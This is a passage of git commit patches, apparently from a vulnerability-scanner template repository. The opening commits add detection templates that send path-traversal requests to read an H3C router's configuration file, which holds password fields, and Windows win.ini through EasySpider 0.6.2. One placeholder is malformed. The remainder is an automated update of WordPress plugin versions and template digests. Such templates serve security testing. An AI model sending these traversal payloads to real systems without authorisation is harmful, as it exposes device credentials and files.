epss-percentile: 0.09279 + metadata: + verified: true + max-request: 1 + fofa-query: app="H3C-Ent-Router" && title=="ER8300G2-X系统管理" + tags: cve,cve2024,instrusive,leak,h3c + +http: + - raw: + - | + GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ER8300G2-X' + - 'if-type' + - 'ifname' + - 'vtyname' + - 'vtypasswd' + - 'auxauthmode' + - 'icenable' + - 'logdisklevel' + condition: and + + - type: word + part: header + words: + - 'application/x-unknown;charset=GB2312' + + - type: status + status: + - 200 From 85bf33e86e9ebf6a4e302cb0f7f3bc79b281569e Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 17 Jul 2024 02:16:51 +0300 Subject: [PATCH 1315/1841] add CVE-2024-6746 --- network/cves/2024/CVE-2024-6746.yaml | 54 ++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 network/cves/2024/CVE-2024-6746.yaml diff --git a/network/cves/2024/CVE-2024-6746.yaml b/network/cves/2024/CVE-2024-6746.yaml new file mode 100644 index 0000000000..aa5e7eb642 --- /dev/null +++ b/network/cves/2024/CVE-2024-6746.yaml @@ -0,0 +1,54 @@ +id: CVE-2024-6746 + +info: + name: EasySpider 0.6.2 - Arbitrary File Read + author: securityforeveryone + severity: medium + description: | + A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network. + reference: + - https://github.com/NaiboWang/EasySpider/issues/466 + - https://cvefeed.io/vuln/detail/CVE-2024-6746 + - https://vuldb.com/?id.271477 + - https://vuldb.com/?submit.371998 + - https://vuldb.com/?ctiid.271477 + - https://github.com/NaiboWang/EasySpider + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-6746 + cwe-id: CWE-24 + epss-score: 0.00045 + epss-percentile: 0.1594 + metadata: + vendor: NaiboWang + product: EasySpider + tags: cve,cve2024,lfi,network + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /taskGrid/tasklist.html HTTP/1.1 + Host: {{Hostname} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"Task List","Task ID","Task Name","URL","任务列表 | Task List")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + GET /../../../../../../../../../Windows/win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"bit app support","fonts","extensions")' + - 'status_code == 200' + condition: and From 011f1716789864b53d622e763a49e9cabedc2182 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 00:20:32 +0000 Subject: [PATCH 1316/1841] Auto WordPress Plugins Update [Wed Jul 17 00:20:32 UTC 2024] :robot: --- helpers/wordpress/plugins/admin-menu-editor.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/custom-fonts.txt | 2 +- .../wordpress/plugins/essential-addons-for-elementor-lite.txt | 2 +- helpers/wordpress/plugins/loco-translate.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/shortpixel-image-optimiser.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- helpers/wordpress/plugins/w3-total-cache.txt | 2 +- .../plugins/woocommerce-pdf-invoices-packing-slips.txt | 2 +- helpers/wordpress/plugins/woocommerce-services.txt | 2 +- helpers/wordpress/plugins/wp-crontrol.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 214 files changed, 14 insertions(+), 214 deletions(-) diff --git a/helpers/wordpress/plugins/admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt index c56eaaaf45..44fdbc3aa3 100644 --- a/helpers/wordpress/plugins/admin-menu-editor.txt +++ b/helpers/wordpress/plugins/admin-menu-editor.txt @@ -1 +1 @@ -1.12.3 \ No newline at end of file +1.12.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 4b8dea47bb..738a7f03f6 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.3.7 \ No newline at end of file +4.3.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-fonts.txt b/helpers/wordpress/plugins/custom-fonts.txt index c5864dcf3e..b6da51221f 100644 --- a/helpers/wordpress/plugins/custom-fonts.txt +++ b/helpers/wordpress/plugins/custom-fonts.txt @@ -1 +1 @@ -2.1.5 \ No newline at end of file +2.1.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index efafb311df..550d6e51d8 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.9.26 \ No newline at end of file +5.9.27 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt index 2b4a67131f..55609e9eee 100644 --- a/helpers/wordpress/plugins/loco-translate.txt +++ b/helpers/wordpress/plugins/loco-translate.txt @@ -1 +1 @@ -2.6.10 \ No newline at end of file +2.6.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 983b22c65d..cc90415fe2 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.55.0 \ No newline at end of file +4.56.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt index 475e184294..25c1b355a1 100644 --- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt +++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt @@ -1 +1 @@ -5.6.2 \ No newline at end of file +5.6.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index e7034819f6..7208c21829 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.3.2 \ No newline at end of file +2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index 575a07b9f9..2ad1684ea1 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.14.0 \ No newline at end of file +2.14.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index e2bdf6e45a..74500cee16 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.7.3 \ No newline at end of file +2.7.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt index 8a8c005df7..8c1da59dbb 100644 --- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -1 +1 @@ -3.8.4 \ No newline at end of file +3.8.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index b8d12d7371..d5724cd41b 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.6.1 \ No newline at end of file +2.6.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-crontrol.txt b/helpers/wordpress/plugins/wp-crontrol.txt index 092afa15df..44c2012635 100644 --- a/helpers/wordpress/plugins/wp-crontrol.txt +++ b/helpers/wordpress/plugins/wp-crontrol.txt @@ -1 +1 @@ -1.17.0 +N/A \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 8d9ff9ec94..94837c4cfb 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.8.1 \ No newline at end of file +14.9 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 52a70bcd1f..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c65b823d5ea99f97e8d18e798271d51bca4942510f098776ddcff1095fe1c23202203df76afb09f08b71d8337f4275bfbb3f707f23239683fd09af198548fd30b49e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 414b8e1f46..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200da6585c66bc8846cd2f9ca26a91e682f5dcb45c5fd8b5d6482453765287a4fe022053773056083cc5deb2811182955c6db3db546c6a7013fa32395942582b868aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 3f9dd9c9f9..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b40b3c8bc7f6e73664404bece294910391a69ea90c9bda651d4ea4b1a6d44679022037b7ac6f050c4a6c7140b2b8e523a264db8d0bd46d6fbd269f5b525165c95862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e0efdbf049..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b8e9474a66e9f53bb5f6511bbd2e0687db461ef22605c04c117b363823b97960221009b10b16219fe1ddca3d95535c1c5188f83491bbcfae9f61366c609dc6e09e4a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 685bc73229..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c283c006f56d4531a17d038ece215b7bcbba1e802da341fe156482f5aed4cc3022009aea70e7c847f937da37422e056b8f6d2d977dc93fa1cf598d4d00badde65c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 96ae6393d1..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088ff73665cfd4c14c4bc8a41145346ba08df6fe5ca5132668978c8369536dbc0022100ef8f41ff0b297cd5eab55929696199dd414507a1863fa0509dd350c70b227cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 23f5c0a784..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b65a492084c14ce7cb4558863c31965501d1f983924886b44df1e5c532aca090221009583ec10a3571aa6968cc28eb63206e0f29aa9f1ca2696c4af461ef67ae195c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index bce4c6c75a..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079ad81fd618dd66f86b18703cb2c9d6e660cea83aa210bd6405b5dee2af11df502202a3e08b399df2ab88c31014dc9eb114415f8783b9cc8a6d71d6e313bec5d0029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 2956599a36..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f08486185fa1c664d9c3bd526c6a1134f25c0c690f7416d1d5f933ca9f9bedc02203469935a9fe2e20b0ccd414464ae42c606c0d0469c1000ae477b8ba37b50be39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index e11435ddc2..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b62a173a79e9c39c665cbbfaa1c9cc5ce7203586bb9a7c74035eed740c4f420702206baafb39b911c2922bb1dfeb064e58a920973ead81221561619aab3f616238d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 74d22f67e3..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079c392a31478d84f9b4bee3f964e4df5be78e88145c0178fe8dcc02ca2acebd0022039f528e9fc1e2dff2f32cc3e6249762429d5a84170628c3c21f7df335d989061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 7dd3eb88d5..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ea65f24e64f20f1c706cef003345c9d44ac00e78f227a2a6a580173dd9e52647022100b1f27362e14c160715da13cc0cd2f8e0fa34ac6ed539be12848d67682a7ecf96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 42ca1cca2d..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203719158333e1637929e373339820d1b8b03e40fec6d5eff273863b2cc35ce6a80220443148b554681622699f05609be51fab0b06d4cfacc095fbc80d6e5fa41ffd52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 29ac03b930..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 